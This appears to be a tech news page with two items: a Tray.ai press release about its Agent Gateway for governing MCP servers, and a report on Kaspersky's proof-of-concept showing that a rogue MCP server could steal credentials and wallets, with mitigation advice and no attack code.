Tray.ai, a platform for building smart, secure AI agents at scale, has announced Agent Gateway, a new capability in the Tray AI Orchestration platform. IT teams use Agent Gateway to build governed, maintainable MCP (Model Context Protocol) servers and MCP tools on Tray, and publish them via MCP for stable, secure agent use across their stack.
As enterprises race to extend agents with new capabilities, shadow MCP servers and tools are being developed in JavaScript, Python and with ad hoc scripts and services, often without IT visibility or required guardrails. As Gartner noted in its September 2025 report, Innovation Insight: MCP Gateways1, “Enterprises are left trying to balance the enthusiasm for adopting MCP, at the cost of governance, against a more risk-averse approach to adoption, at the risk of missing the innovation boat.”
Tray Agent Gateway provides a managed environment for creating MCP servers and tools with defined policies, permissions and versioning, so IT can maintain security and compliance, reduce shadow MCP development and prepare the agent ecosystem for emerging standards like A2A (Agent-to-Agent).
“Unmanaged MCP use looks a lot like the API sprawl we saw in the early days of the cloud era,” said Alistair Russell,
Governance for evolving AI standards
• Agent Gateway provides interoperability with MCP and other emerging protocols that IT teams use to bring rigour, governance, and observability to the enterprise agent stack. Teams can define, test, version and document MCP services, apply scope and guardrails and share them selectively across their agent landscape.
Three core ways to use MCP are supported by Agent Gateway:
• Build composite MCP tools: Teams can create sophisticated composite tools in Merlin Agent Builder and publish them as MCP services. These tools can perform complex tasks or entire processes end-to-end and connect to and take action across any system, from apps to other AI services. Tray Guardian embeds guardrails, enabling users to mitigate unpredictable agent behaviour by encoding business rules for consistent, auditable outcomes.
• Publish connector-backed MCP tools: Tray’s library of 700+ managed connectors can now be published as MCP tools, instantly giving MCP-enabled agents secure reach across CRM, ERP, HR, analytics and other apps, all with the governance enterprises expect.
• Consume external MCP servers: Tray Agents can securely consume external MCP servers while IT gains centralised visibility, logging and auditability.
“AI agents will only scale when enterprises standardise how capabilities are added and governed,” said Rich Waldron,
Agent Gateway gives IT centralised command over Tray-built MCP servers and tools developed across the organisation. By defining MCP servers within Tray Workspaces and Projects, teams can decide which MCP tools are exposed and under what conditions. Hence, each MCP deployment aligns with enterprise policies and security scope.
Every MCP tool and execution is instrumented in Tray Insights Hub, logged and versioned for traceability. This creates a complete audit trail that can be streamed to observability platforms such as Datadog or Splunk, giving IT clear oversight without slowing delivery. With clearly defined ownership, version control and documentation, IT can maintain governance across hundreds of agents and tools, replacing fragmented, ad hoc development with a single managed environment.
Together, Tray Agent Hub and Tray Agent Gateway are part of Merlin Agent Builder, creating a single environment for teams to build, govern and scale enterprise agents. Agent Hub provides the composable building blocks for agent creation, while Agent Gateway delivers governance and control over how those tools are developed, shared and maintained. With both capabilities in one experience, Merlin Agent Builder is now the one-stop environment for designing, deploying and managing agents securely at enterprise scale.
Future-proof architecture for multi-agent interoperability
Agent Gateway is built as a multi-protocol capability, supporting MCP today and engineered for Google’s A2A and future agent-to-agent interoperability standards. With this architecture, Tray Agents can communicate, delegate and collaborate with third-party agents while maintaining enterprise consistency and control.
By unifying governance across protocols, Agent Gateway future-proofs the enterprise tech stack, giving teams confidence that their AI orchestration strategy will remain compatible as new standards emerge.
For more information, go to www.tray.ai
[1] Gartner, “Innovation Insight: MCP Gateways,” Keith Guttridge, Andrew Humphreys, Gary Olliffe, Aaron Lord,
AI connector could be abused by cyberattackers

Kaspersky has found that the Model Context Protocol (MCP) could be weaponised by cybercriminals as a supply chain attack vector, potentially leading to harmful impacts, including, but not limited to, the leakage of passwords, credit card numbers, cryptowallets, and other types of data. In its new research, Kaspersky experts show the concept of an attack and share mitigation measures for businesses that integrate AI tools into their workflows.
Open-sourced by Anthropic in 2024, the MCP is a standard that gives AI systems, especially LLM-based apps, a consistent way to connect to external tools and services. For instance, organisations may use it to let LLMs search and update documents, manage code repositories and APIs, or access CRM, financial, and cloud data.
Like any open-source tool, MCP can be abused by cybercriminals. In its new research, the Kaspersky Emergency Response Team experts built a proof-of-concept to simulate how attackers might abuse an MCP server. This was to demonstrate how supply chain attacks can unfold through the protocol and to showcase the potential harm that might come from running such tools without proper auditing. Performing a controlled security lab test, they simulated a developer workstation with a rogue MCP server installed, ultimately harvesting such sensitive data types as:
• Browser passwords.
• Credit card data.
• Cryptocurrency wallet files.
• API tokens and certificates.
• Cloud configurations and more.
During the simulated attack, a ‘victim’ only sees the legitimate output. Kaspersky has not yet observed this vector in the wild and warns that it may be used by cybercriminals not only to extract sensitive data, but also to cause other harmful impacts, such as executing malicious code, installing backdoors, and deploying ransomware.
“Supply chain attacks remain one of the most pressing threats in the cybersecurity space, and the potential weaponisation of MCP we demonstrated follows this trend. With the current hype around AI and the race to integrate these tools into workflows, businesses may lower their guard and, by adopting a seemingly legitimate, but unproven custom MCP, perhaps posted on Reddit or similar platforms, end up suffering a data breach. This underscores the importance of a strong security posture,” says Mohamed Ghobashy, incident response specialist in the Kaspersky Global Emergency Response Team.
To manage the risks associated with MCP abuse attacks, Kaspersky experts suggest that users:
• Check the MCP before installation. Submit every new server to a process that scans, reviews, and approves it before production use. Maintain a whitelist of approved servers so anything new stands out immediately.
• Lock it down. Run servers in containers or virtual machines with access limited to only the folders they require, and isolate networks so development environments cannot reach production or other sensitive systems.
• Monitor for odd behaviour and anomalies. Log every prompt and response so that hidden instructions or unusual tool calls can be spotted in the transcript. Keep an eye out for suspicious prompts, unexpected SQL commands, or unusual data flows, like outbound traffic triggered by agents outside standard workflows.
• Adopt managed security services. They help protect against evasive cyberattacks, investigate incidents, and gain additional expertise, even if a company lacks cybersecurity workers.
Learn more at www.kaspersky.co.za
© Technews Publishing (Pty) Ltd. | All Rights Reserved.